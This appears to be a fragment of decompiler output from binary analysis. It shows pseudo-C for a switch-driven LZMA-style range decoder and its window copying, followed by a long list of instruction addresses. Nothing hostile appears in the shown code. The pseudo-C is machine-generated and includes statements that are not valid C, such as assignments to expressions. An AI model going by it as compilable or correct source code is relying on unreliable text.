                                                  							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                  							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                  							__eflags = _v60 - 4;
                                                  							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                  							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                  							if(_v60 >= 4) {
                                                  								__eflags = _v60 - 0xa;
                                                  								if(_v60 >= 0xa) {
                                                  									_t103 =  &_v60;
                                                  									 *_t103 = _v60 - 6;
                                                  									__eflags =  *_t103;
                                                  								} else {
                                                  									_v60 = _v60 - 3;
                                                  								}
                                                  							} else {
                                                  								_v60 = 0;
                                                  							}
                                                  							__eflags = _v56 - __edx;
                                                  							if(_v56 == __edx) {
                                                  								__ebx = 0;
                                                  								__ebx = 1;
                                                  								goto L63;
                                                  							}
                                                  							__eax = _v24;
                                                  							__eax = _v24 - _v48;
                                                  							__eflags = __eax - _v120;
                                                  							if(__eax >= _v120) {
                                                  								__eax = __eax + _v120;
                                                  								__eflags = __eax;
                                                  							}
                                                  							__ecx = _v12;
                                                  							__ebx = 0;
                                                  							__ebx = 1;
                                                  							__al =  *((intOrPtr*)(__eax + __ecx));
                                                  							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                  							goto L43;
                                                  						case 7:
                                                  							__eflags = _v68 - 1;
                                                  							if(_v68 != 1) {
                                                  								__eax = _v40;
                                                  								_v132 = 0x16;
                                                  								_v36 = _v40;
                                                  								__eax = _v44;
                                                  								_v40 = _v44;
                                                  								__eax = _v48;
                                                  								_v44 = _v48;
                                                  								__eax = 0;
                                                  								__eflags = _v60 - 7;
                                                  								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  								__al = __al & 0x000000fd;
                                                  								__eax = (__eflags >= 0) - 1 + 0xa;
                                                  								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                  								__eax = _v8;
                                                  								__eax = _v8 + 0x664;
                                                  								__eflags = __eax;
                                                  								_v92 = __eax;
                                                  								goto L71;
                                                  							}
                                                  							__eax = _v8;
                                                  							__ecx = _v60;
                                                  							_v136 = 8;
                                                  							__esi = _v8 + 0x198 + _v60 * 2;
                                                  							goto L135;
                                                  						case 8:
                                                  							__eflags = _v68;
                                                  							if(_v68 != 0) {
                                                  								__eax = _v8;
                                                  								__ecx = _v60;
                                                  								_v136 = 0xa;
                                                  								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                  							} else {
                                                  								__eax = _v60;
                                                  								__ecx = _v8;
                                                  								__eax = _v60 + 0xf;
                                                  								_v136 = 9;
                                                  								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                  								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                  							}
                                                  							goto L135;
                                                  						case 9:
                                                  							__eflags = _v68;
                                                  							if(_v68 != 0) {
                                                  								goto L92;
                                                  							}
                                                  							__eflags = _v100;
                                                  							if(_v100 == 0) {
                                                  								goto L174;
                                                  							}
                                                  							__eax = 0;
                                                  							__eflags = _v60 - 7;
                                                  							_t264 = _v60 - 7 >= 0;
                                                  							__eflags = _t264;
                                                  							0 | _t264 = _t264 + _t264 + 9;
                                                  							_v60 = _t264 + _t264 + 9;
                                                  							goto L78;
                                                  						case 0xa:
                                                  							__eflags = _v68;
                                                  							if(_v68 != 0) {
                                                  								__eax = _v8;
                                                  								__ecx = _v60;
                                                  								_v136 = 0xb;
                                                  								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                  								goto L135;
                                                  							}
                                                  							__eax = _v44;
                                                  							goto L91;
                                                  						case 0xb:
                                                  							__eflags = _v68;
                                                  							if(_v68 != 0) {
                                                  								__ecx = _v40;
                                                  								__eax = _v36;
                                                  								_v36 = _v40;
                                                  							} else {
                                                  								__eax = _v40;
                                                  							}
                                                  							__ecx = _v44;
                                                  							_v40 = _v44;
                                                  							L91:
                                                  							__ecx = _v48;
                                                  							_v48 = __eax;
                                                  							_v44 = _v48;
                                                  							L92:
                                                  							__eax = _v8;
                                                  							_v132 = 0x15;
                                                  							__eax = _v8 + 0xa68;
                                                  							_v92 = _v8 + 0xa68;
                                                  							goto L71;
                                                  						case 0xc:
                                                  							L102:
                                                  							__eflags = _v112;
                                                  							if(_v112 == 0) {
                                                  								_v140 = 0xc;
                                                  								goto L173;
                                                  							}
                                                  							__ecx = _v116;
                                                  							__eax = _v16;
                                                  							_v20 = _v20 << 8;
                                                  							__ecx =  *_v116 & 0x000000ff;
                                                  							_v112 = _v112 - 1;
                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							_t340 =  &_v116;
                                                  							 *_t340 = _v116 + 1;
                                                  							__eflags =  *_t340;
                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							__eax = _v48;
                                                  							goto L104;
                                                  						case 0xd:
                                                  							L39:
                                                  							__eflags = _v112;
                                                  							if(_v112 == 0) {
                                                  								_v140 = 0xd;
                                                  								goto L173;
                                                  							}
                                                  							__ecx = _v116;
                                                  							__eax = _v16;
                                                  							_v20 = _v20 << 8;
                                                  							__ecx =  *_v116 & 0x000000ff;
                                                  							_v112 = _v112 - 1;
                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							_t127 =  &_v116;
                                                  							 *_t127 = _v116 + 1;
                                                  							__eflags =  *_t127;
                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							L41:
                                                  							__eax = _v68;
                                                  							__eflags = _v76 - _v68;
                                                  							if(_v76 != _v68) {
                                                  								goto L50;
                                                  							}
                                                  							__eflags = __ebx - 0x100;
                                                  							if(__ebx >= 0x100) {
                                                  								goto L56;
                                                  							}
                                                  							L43:
                                                  							__eax = _v95 & 0x000000ff;
                                                  							_v95 = _v95 << 1;
                                                  							__ecx = _v92;
                                                  							__eax = (_v95 & 0x000000ff) >> 7;
                                                  							_v76 = __eax;
                                                  							__eax = __eax + 1;
                                                  							__eax = __eax << 8;
                                                  							__eax = __eax + __ebx;
                                                  							__esi = _v92 + __eax * 2;
                                                  							_v20 = _v20 >> 0xb;
                                                  							__ax =  *__esi;
                                                  							_v88 = __esi;
                                                  							__edx = __ax & 0x0000ffff;
                                                  							__ecx = (_v20 >> 0xb) * __edx;
                                                  							__eflags = _v16 - __ecx;
                                                  							if(_v16 >= __ecx) {
                                                  								_v20 = _v20 - __ecx;
                                                  								_v16 = _v16 - __ecx;
                                                  								__cx = __ax;
                                                  								_v68 = 1;
                                                  								__cx = __ax >> 5;
                                                  								__eflags = __eax;
                                                  								__ebx = __ebx + __ebx + 1;
                                                  								 *__esi = __ax;
                                                  							} else {
                                                  								_v68 = _v68 & 0x00000000;
                                                  								_v20 = __ecx;
                                                  								0x800 = 0x800 - __edx;
                                                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                  								__ebx = __ebx + __ebx;
                                                  								 *__esi = __cx;
                                                  							}
                                                  							__eflags = _v20 - 0x1000000;
                                                  							_v72 = __ebx;
                                                  							if(_v20 >= 0x1000000) {
                                                  								goto L41;
                                                  							} else {
                                                  								goto L39;
                                                  							}
                                                  						case 0xe:
                                                  							L48:
                                                  							__eflags = _v112;
                                                  							if(_v112 == 0) {
                                                  								_v140 = 0xe;
                                                  								goto L173;
                                                  							}
                                                  							__ecx = _v116;
                                                  							__eax = _v16;
                                                  							_v20 = _v20 << 8;
                                                  							__ecx =  *_v116 & 0x000000ff;
                                                  							_v112 = _v112 - 1;
                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							_t161 =  &_v116;
                                                  							 *_t161 = _v116 + 1;
                                                  							__eflags =  *_t161;
                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							while(1) {
                                                  								L50:
                                                  								__eflags = __ebx - 0x100;
                                                  								if(__ebx >= 0x100) {
                                                  									break;
                                                  								}
                                                  								__eax = _v92;
                                                  								__edx = __ebx + __ebx;
                                                  								__ecx = _v20;
                                                  								__esi = __edx + __eax;
                                                  								__ecx = _v20 >> 0xb;
                                                  								__ax =  *__esi;
                                                  								_v88 = __esi;
                                                  								__edi = __ax & 0x0000ffff;
                                                  								__ecx = (_v20 >> 0xb) * __edi;
                                                  								__eflags = _v16 - __ecx;
                                                  								if(_v16 >= __ecx) {
                                                  									_v20 = _v20 - __ecx;
                                                  									_v16 = _v16 - __ecx;
                                                  									__cx = __ax;
                                                  									_t175 = __edx + 1; // 0x1
                                                  									__ebx = _t175;
                                                  									__cx = __ax >> 5;
                                                  									__eflags = __eax;
                                                  									 *__esi = __ax;
                                                  								} else {
                                                  									_v20 = __ecx;
                                                  									0x800 = 0x800 - __edi;
                                                  									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  									__ebx = __ebx + __ebx;
                                                  									 *__esi = __cx;
                                                  								}
                                                  								__eflags = _v20 - 0x1000000;
                                                  								_v72 = __ebx;
                                                  								if(_v20 >= 0x1000000) {
                                                  									continue;
                                                  								} else {
                                                  									goto L48;
                                                  								}
                                                  							}
                                                  							L56:
                                                  							_t178 =  &_v56;
                                                  							 *_t178 = _v56 & 0x00000000;
                                                  							__eflags =  *_t178;
                                                  							goto L57;
                                                  						case 0xf:
                                                  							L60:
                                                  							__eflags = _v112;
                                                  							if(_v112 == 0) {
                                                  								_v140 = 0xf;
                                                  								goto L173;
                                                  							}
                                                  							__ecx = _v116;
                                                  							__eax = _v16;
                                                  							_v20 = _v20 << 8;
                                                  							__ecx =  *_v116 & 0x000000ff;
                                                  							_v112 = _v112 - 1;
                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							_t208 =  &_v116;
                                                  							 *_t208 = _v116 + 1;
                                                  							__eflags =  *_t208;
                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							L62:
                                                  							__eflags = __ebx - 0x100;
                                                  							if(__ebx >= 0x100) {
                                                  								L57:
                                                  								__al = _v72;
                                                  								_v96 = _v72;
                                                  								goto L58;
                                                  							}
                                                  							L63:
                                                  							__eax = _v92;
                                                  							__edx = __ebx + __ebx;
                                                  							__ecx = _v20;
                                                  							__esi = __edx + __eax;
                                                  							__ecx = _v20 >> 0xb;
                                                  							__ax =  *__esi;
                                                  							_v88 = __esi;
                                                  							__edi = __ax & 0x0000ffff;
                                                  							__ecx = (_v20 >> 0xb) * __edi;
                                                  							__eflags = _v16 - __ecx;
                                                  							if(_v16 >= __ecx) {
                                                  								_v20 = _v20 - __ecx;
                                                  								_v16 = _v16 - __ecx;
                                                  								__cx = __ax;
                                                  								_t222 = __edx + 1; // 0x1
                                                  								__ebx = _t222;
                                                  								__cx = __ax >> 5;
                                                  								__eflags = __eax;
                                                  								 *__esi = __ax;
                                                  							} else {
                                                  								_v20 = __ecx;
                                                  								0x800 = 0x800 - __edi;
                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  								__ebx = __ebx + __ebx;
                                                  								 *__esi = __cx;
                                                  							}
                                                  							__eflags = _v20 - 0x1000000;
                                                  							_v72 = __ebx;
                                                  							if(_v20 >= 0x1000000) {
                                                  								goto L62;
                                                  							} else {
                                                  								goto L60;
                                                  							}
                                                  						case 0x10:
                                                  							L112:
                                                  							__eflags = _v112;
                                                  							if(_v112 == 0) {
                                                  								_v140 = 0x10;
                                                  								goto L173;
                                                  							}
                                                  							__ecx = _v116;
                                                  							__eax = _v16;
                                                  							_v20 = _v20 << 8;
                                                  							__ecx =  *_v116 & 0x000000ff;
                                                  							_v112 = _v112 - 1;
                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							_t371 =  &_v116;
                                                  							 *_t371 = _v116 + 1;
                                                  							__eflags =  *_t371;
                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							goto L114;
                                                  						case 0x11:
                                                  							L71:
                                                  							__esi = _v92;
                                                  							_v136 = 0x12;
                                                  							goto L135;
                                                  						case 0x12:
                                                  							__eflags = _v68;
                                                  							if(_v68 != 0) {
                                                  								__eax = _v92;
                                                  								_v136 = 0x13;
                                                  								__esi = _v92 + 2;
                                                  								L135:
                                                  								_v88 = _t626;
                                                  								goto L136;
                                                  							}
                                                  							__eax = _v80;
                                                  							_v52 = _v52 & 0x00000000;
                                                  							__ecx = _v92;
                                                  							__eax = _v80 << 4;
                                                  							__eflags = __eax;
                                                  							__eax = _v92 + __eax + 4;
                                                  							goto L133;
                                                  						case 0x13:
                                                  							__eflags = _v68;
                                                  							if(_v68 != 0) {
                                                  								_t475 =  &_v92;
                                                  								 *_t475 = _v92 + 0x204;
                                                  								__eflags =  *_t475;
                                                  								_v52 = 0x10;
                                                  								_v68 = 8;
                                                  								L147:
                                                  								_v128 = 0x14;
                                                  								goto L148;
                                                  							}
                                                  							__eax = _v80;
                                                  							__ecx = _v92;
                                                  							__eax = _v80 << 4;
                                                  							_v52 = 8;
                                                  							__eax = _v92 + (_v80 << 4) + 0x104;
                                                  							L133:
                                                  							_v92 = __eax;
                                                  							_v68 = 3;
                                                  							goto L147;
                                                  						case 0x14:
                                                  							_v52 = _v52 + __ebx;
                                                  							__eax = _v132;
                                                  							goto L143;
                                                  						case 0x15:
                                                  							__eax = 0;
                                                  							__eflags = _v60 - 7;
                                                  							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  							__al = __al & 0x000000fd;
                                                  							__eax = (__eflags >= 0) - 1 + 0xb;
                                                  							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                  							goto L123;
                                                  						case 0x16:
                                                  							__eax = _v52;
                                                  							__eflags = __eax - 4;
                                                  							if(__eax >= 4) {
                                                  								_push(3);
                                                  								_pop(__eax);
                                                  							}
                                                  							__ecx = _v8;
                                                  							_v68 = 6;
                                                  							__eax = __eax << 7;
                                                  							_v128 = 0x19;
                                                  							_v92 = __eax;
                                                  							goto L148;
                                                  						case 0x17:
                                                  							L148:
                                                  							__eax = _v68;
                                                  							_v84 = 1;
                                                  							_v76 = _v68;
                                                  							goto L152;
                                                  						case 0x18:
                                                  							L149:
                                                  							__eflags = _v112;
                                                  							if(_v112 == 0) {
                                                  								_v140 = 0x18;
                                                  								goto L173;
                                                  							}
                                                  							__ecx = _v116;
                                                  							__eax = _v16;
                                                  							_v20 = _v20 << 8;
                                                  							__ecx =  *_v116 & 0x000000ff;
                                                  							_v112 = _v112 - 1;
                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							_t490 =  &_v116;
                                                  							 *_t490 = _v116 + 1;
                                                  							__eflags =  *_t490;
                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							L151:
                                                  							_t493 =  &_v76;
                                                  							 *_t493 = _v76 - 1;
                                                  							__eflags =  *_t493;
                                                  							L152:
                                                  							__eflags = _v76;
                                                  							if(_v76 <= 0) {
                                                  								__ecx = _v68;
                                                  								__ebx = _v84;
                                                  								0 = 1;
                                                  								__eax = 1 << __cl;
                                                  								__ebx = _v84 - (1 << __cl);
                                                  								__eax = _v128;
                                                  								_v72 = __ebx;
                                                  								L143:
                                                  								_v140 = _t561;
                                                  								goto L3;
                                                  							}
                                                  							__eax = _v84;
                                                  							_v20 = _v20 >> 0xb;
                                                  							__edx = _v84 + _v84;
                                                  							__eax = _v92;
                                                  							__esi = __edx + __eax;
                                                  							_v88 = __esi;
                                                  							__ax =  *__esi;
                                                  							__edi = __ax & 0x0000ffff;
                                                  							__ecx = (_v20 >> 0xb) * __edi;
                                                  							__eflags = _v16 - __ecx;
                                                  							if(_v16 >= __ecx) {
                                                  								_v20 = _v20 - __ecx;
                                                  								_v16 = _v16 - __ecx;
                                                  								__cx = __ax;
                                                  								__cx = __ax >> 5;
                                                  								__eax = __eax - __ecx;
                                                  								__edx = __edx + 1;
                                                  								__eflags = __edx;
                                                  								 *__esi = __ax;
                                                  								_v84 = __edx;
                                                  							} else {
                                                  								_v20 = __ecx;
                                                  								0x800 = 0x800 - __edi;
                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  								_v84 = _v84 << 1;
                                                  								 *__esi = __cx;
                                                  							}
                                                  							__eflags = _v20 - 0x1000000;
                                                  							if(_v20 >= 0x1000000) {
                                                  								goto L151;
                                                  							} else {
                                                  								goto L149;
                                                  							}
                                                  						case 0x19:
                                                  							__eflags = __ebx - 4;
                                                  							if(__ebx < 4) {
                                                  								_v48 = __ebx;
                                                  								L122:
                                                  								_t399 =  &_v48;
                                                  								 *_t399 = _v48 + 1;
                                                  								__eflags =  *_t399;
                                                  								L123:
                                                  								__eax = _v48;
                                                  								__eflags = __eax;
                                                  								if(__eax == 0) {
                                                  									_v52 = _v52 | 0xffffffff;
                                                  									goto L173;
                                                  								}
                                                  								__eflags = __eax - _v100;
                                                  								if(__eax > _v100) {
                                                  									goto L174;
                                                  								}
                                                  								_v52 = _v52 + 2;
                                                  								__eax = _v52;
                                                  								_t406 =  &_v100;
                                                  								 *_t406 = _v100 + _v52;
                                                  								__eflags =  *_t406;
                                                  								goto L126;
                                                  							}
                                                  							__ecx = __ebx;
                                                  							__eax = __ebx;
                                                  							__ecx = __ebx >> 1;
                                                  							__eax = __ebx & 0x00000001;
                                                  							__ecx = (__ebx >> 1) - 1;
                                                  							__al = __al | 0x00000002;
                                                  							__eax = (__ebx & 0x00000001) << __cl;
                                                  							__eflags = __ebx - 0xe;
                                                  							_v48 = __eax;
                                                  							if(__ebx >= 0xe) {
                                                  								__ebx = 0;
                                                  								_v76 = __ecx;
                                                  								L105:
                                                  								__eflags = _v76;
                                                  								if(_v76 <= 0) {
                                                  									__eax = __eax + __ebx;
                                                  									_v68 = 4;
                                                  									_v48 = __eax;
                                                  									__eax = _v8;
                                                  									__eax = _v8 + 0x644;
                                                  									__eflags = __eax;
                                                  									L111:
                                                  									__ebx = 0;
                                                  									_v92 = __eax;
                                                  									_v84 = 1;
                                                  									_v72 = 0;
                                                  									_v76 = 0;
                                                  									L115:
                                                  									__eax = _v68;
                                                  									__eflags = _v76 - _v68;
                                                  									if(_v76 >= _v68) {
                                                  										_t397 =  &_v48;
                                                  										 *_t397 = _v48 + __ebx;
                                                  										__eflags =  *_t397;
                                                  										goto L122;
                                                  									}
                                                  									__eax = _v84;
                                                  									_v20 = _v20 >> 0xb;
                                                  									__edi = _v84 + _v84;
                                                  									__eax = _v92;
                                                  									__esi = __edi + __eax;
                                                  									_v88 = __esi;
                                                  									__ax =  *__esi;
                                                  									__ecx = __ax & 0x0000ffff;
                                                  									__edx = (_v20 >> 0xb) * __ecx;
                                                  									__eflags = _v16 - __edx;
                                                  									if(_v16 >= __edx) {
                                                  										__ecx = 0;
                                                  										_v20 = _v20 - __edx;
                                                  										__ecx = 1;
                                                  										_v16 = _v16 - __edx;
                                                  										__ebx = 1;
                                                  										__ecx = _v76;
                                                  										__ebx = 1 << __cl;
                                                  										__ecx = 1 << __cl;
                                                  										__ebx = _v72;
                                                  										__ebx = _v72 | __ecx;
                                                  										__cx = __ax;
                                                  										__cx = __ax >> 5;
                                                  										__eax = __eax - __ecx;
                                                  										__edi = __edi + 1;
                                                  										__eflags = __edi;
                                                  										_v72 = __ebx;
                                                  										 *__esi = __ax;
                                                  										_v84 = __edi;
                                                  									} else {
                                                  										_v20 = __edx;
                                                  										0x800 = 0x800 - __ecx;
                                                  										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                  										_v84 = _v84 << 1;
                                                  										 *__esi = __dx;
                                                  									}
                                                  									__eflags = _v20 - 0x1000000;
                                                  									if(_v20 >= 0x1000000) {
                                                  										L114:
                                                  										_t374 =  &_v76;
                                                  										 *_t374 = _v76 + 1;
                                                  										__eflags =  *_t374;
                                                  										goto L115;
                                                  									} else {
                                                  										goto L112;
                                                  									}
                                                  								}
                                                  								__ecx = _v16;
                                                  								__ebx = __ebx + __ebx;
                                                  								_v20 = _v20 >> 1;
                                                  								__eflags = _v16 - _v20;
                                                  								_v72 = __ebx;
                                                  								if(_v16 >= _v20) {
                                                  									__ecx = _v20;
                                                  									_v16 = _v16 - _v20;
                                                  									__ebx = __ebx | 0x00000001;
                                                  									__eflags = __ebx;
                                                  									_v72 = __ebx;
                                                  								}
                                                  								__eflags = _v20 - 0x1000000;
                                                  								if(_v20 >= 0x1000000) {
                                                  									L104:
                                                  									_t344 =  &_v76;
                                                  									 *_t344 = _v76 - 1;
                                                  									__eflags =  *_t344;
                                                  									goto L105;
                                                  								} else {
                                                  									goto L102;
                                                  								}
                                                  							}
                                                  							__edx = _v8;
                                                  							__eax = __eax - __ebx;
                                                  							_v68 = __ecx;
                                                  							__eax = _v8 + 0x55e + __eax * 2;
                                                  							goto L111;
                                                  						case 0x1a:
                                                  							L58:
                                                  							__eflags = _v104;
                                                  							if(_v104 == 0) {
                                                  								_v140 = 0x1a;
                                                  								goto L173;
                                                  							}
                                                  							__ecx = _v108;
                                                  							__al = _v96;
                                                  							__edx = _v12;
                                                  							_v100 = _v100 + 1;
                                                  							_v108 = _v108 + 1;
                                                  							_v104 = _v104 - 1;
                                                  							 *_v108 = __al;
                                                  							__ecx = _v24;
                                                  							 *(_v12 + __ecx) = __al;
                                                  							__eax = __ecx + 1;
                                                  							__edx = 0;
                                                  							_t197 = __eax % _v120;
                                                  							__eax = __eax / _v120;
                                                  							__edx = _t197;
                                                  							goto L82;
                                                  						case 0x1b:
                                                  							L78:
                                                  							__eflags = _v104;
                                                  							if(_v104 == 0) {
                                                  								_v140 = 0x1b;
                                                  								goto L173;
                                                  							}
                                                  							__eax = _v24;
                                                  							__eax = _v24 - _v48;
                                                  							__eflags = __eax - _v120;
                                                  							if(__eax >= _v120) {
                                                  								__eax = __eax + _v120;
                                                  								__eflags = __eax;
                                                  							}
                                                  							__edx = _v12;
                                                  							__cl =  *(__edx + __eax);
                                                  							__eax = _v24;
                                                  							_v96 = __cl;
                                                  							 *(__edx + __eax) = __cl;
                                                  							__eax = __eax + 1;
                                                  							__edx = 0;
                                                  							_t280 = __eax % _v120;
                                                  							__eax = __eax / _v120;
                                                  							__edx = _t280;
                                                  							__eax = _v108;
                                                  							_v100 = _v100 + 1;
                                                  							_v108 = _v108 + 1;
                                                  							_t289 =  &_v104;
                                                  							 *_t289 = _v104 - 1;
                                                  							__eflags =  *_t289;
                                                  							 *_v108 = __cl;
                                                  							L82:
                                                  							_v24 = __edx;
                                                  							goto L83;
                                                  						case 0x1c:
                                                  							while(1) {
                                                  								L126:
                                                  								__eflags = _v104;
                                                  								if(_v104 == 0) {
                                                  									break;
                                                  								}
                                                  								__eax = _v24;
                                                  								__eax = _v24 - _v48;
                                                  								__eflags = __eax - _v120;
                                                  								if(__eax >= _v120) {
                                                  									__eax = __eax + _v120;
                                                  									__eflags = __eax;
                                                  								}
                                                  								__edx = _v12;
                                                  								__cl =  *(__edx + __eax);
                                                  								__eax = _v24;
                                                  								_v96 = __cl;
                                                  								 *(__edx + __eax) = __cl;
                                                  								__eax = __eax + 1;
                                                  								__edx = 0;
                                                  								_t420 = __eax % _v120;
                                                  								__eax = __eax / _v120;
                                                  								__edx = _t420;
                                                  								__eax = _v108;
                                                  								_v108 = _v108 + 1;
                                                  								_v104 = _v104 - 1;
                                                  								_v52 = _v52 - 1;
                                                  								__eflags = _v52;
                                                  								 *_v108 = __cl;
                                                  								_v24 = _t420;
                                                  								if(_v52 > 0) {
                                                  									continue;
                                                  								} else {
                                                  									L83:
                                                  									_v140 = 2;
                                                  									goto L3;
                                                  								}
                                                  							}
                                                  							_v140 = 0x1c;
                                                  							L173:
                                                  							_push(0x22);
                                                  							_pop(_t574);
                                                  							memcpy(_v148,  &_v140, _t574 << 2);
                                                  							return 0;
                                                  					}
                                                  				}
                                                  				L174:
                                                  				_t538 = _t537 | 0xffffffff;
                                                  				return _t538;
                                                  			}

                                                  0x004067f4
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f9
                                                  0x004067fc
                                                  0x00000000
                                                  0x00000000
                                                  0x004063cc
                                                  0x004063cc
                                                  0x004063d0
                                                  0x00406b3d
                                                  0x00000000
                                                  0x00406b3d
                                                  0x004063d6
                                                  0x004063d9
                                                  0x004063dc
                                                  0x004063e0
                                                  0x004063e3
                                                  0x004063e9
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063ee
                                                  0x004063f1
                                                  0x004063f1
                                                  0x004063f4
                                                  0x004063f7
                                                  0x00000000
                                                  0x00000000
                                                  0x004063fd
                                                  0x00406403
                                                  0x00000000
                                                  0x00000000
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640d
                                                  0x00406410
                                                  0x00406413
                                                  0x00406416
                                                  0x00406419
                                                  0x0040641a
                                                  0x0040641d
                                                  0x0040641f
                                                  0x00406425
                                                  0x00406428
                                                  0x0040642b
                                                  0x0040642e
                                                  0x00406431
                                                  0x00406434
                                                  0x00406437
                                                  0x00406453
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645c
                                                  0x00406463
                                                  0x00406467
                                                  0x00406469
                                                  0x0040646d
                                                  0x00406439
                                                  0x00406439
                                                  0x0040643d
                                                  0x00406445
                                                  0x0040644a
                                                  0x0040644c
                                                  0x0040644e
                                                  0x0040644e
                                                  0x00406470
                                                  0x00406477
                                                  0x0040647a
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406485
                                                  0x00406485
                                                  0x00406489
                                                  0x00406b49
                                                  0x00000000
                                                  0x00406b49
                                                  0x0040648f
                                                  0x00406492
                                                  0x00406495
                                                  0x00406499
                                                  0x0040649c
                                                  0x004064a2
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a7
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064b0
                                                  0x00000000
                                                  0x00000000
                                                  0x004064b2
                                                  0x004064b5
                                                  0x004064b8
                                                  0x004064bb
                                                  0x004064be
                                                  0x004064c1
                                                  0x004064c4
                                                  0x004064c7
                                                  0x004064ca
                                                  0x004064cd
                                                  0x004064d0
                                                  0x004064e8
                                                  0x004064eb
                                                  0x004064ee
                                                  0x004064f1
                                                  0x004064f1
                                                  0x004064f4
                                                  0x004064f8
                                                  0x004064fa
                                                  0x004064d2
                                                  0x004064d2
                                                  0x004064da
                                                  0x004064df
                                                  0x004064e1
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064fd
                                                  0x00406504
                                                  0x00406507
                                                  0x00000000
                                                  0x00406509
                                                  0x00000000
                                                  0x00406509
                                                  0x00406507
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406549
                                                  0x00406549
                                                  0x0040654d
                                                  0x00406b55
                                                  0x00000000
                                                  0x00406b55
                                                  0x00406553
                                                  0x00406556
                                                  0x00406559
                                                  0x0040655d
                                                  0x00406560
                                                  0x00406566
                                                  0x00406568
                                                  0x00406568
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406574
                                                  0x00406512
                                                  0x00406512
                                                  0x00406515
                                                  0x00000000
                                                  0x00406515
                                                  0x00406576
                                                  0x00406576
                                                  0x00406579
                                                  0x0040657c
                                                  0x0040657f
                                                  0x00406582
                                                  0x00406585
                                                  0x00406588
                                                  0x0040658b
                                                  0x0040658e
                                                  0x00406591
                                                  0x00406594
                                                  0x004065ac
                                                  0x004065af
                                                  0x004065b2
                                                  0x004065b5
                                                  0x004065b5
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065be
                                                  0x00406596
                                                  0x00406596
                                                  0x0040659e
                                                  0x004065a3
                                                  0x004065a5
                                                  0x004065a7
                                                  0x004065a7
                                                  0x004065c1
                                                  0x004065c8
                                                  0x004065cb
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x0040685a
                                                  0x0040685a
                                                  0x0040685e
                                                  0x00406b85
                                                  0x00000000
                                                  0x00406b85
                                                  0x00406864
                                                  0x00406867
                                                  0x0040686a
                                                  0x0040686e
                                                  0x00406871
                                                  0x00406877
                                                  0x00406879
                                                  0x00406879
                                                  0x00406879
                                                  0x0040687c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040662a
                                                  0x0040662a
                                                  0x0040662d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406969
                                                  0x0040696d
                                                  0x0040698f
                                                  0x00406992
                                                  0x0040699c
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x0040696f
                                                  0x00406972
                                                  0x00406976
                                                  0x00406979
                                                  0x00406979
                                                  0x0040697c
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406a2a
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a4f
                                                  0x00406a56
                                                  0x00406a5d
                                                  0x00406a5d
                                                  0x00000000
                                                  0x00406a5d
                                                  0x00406a2c
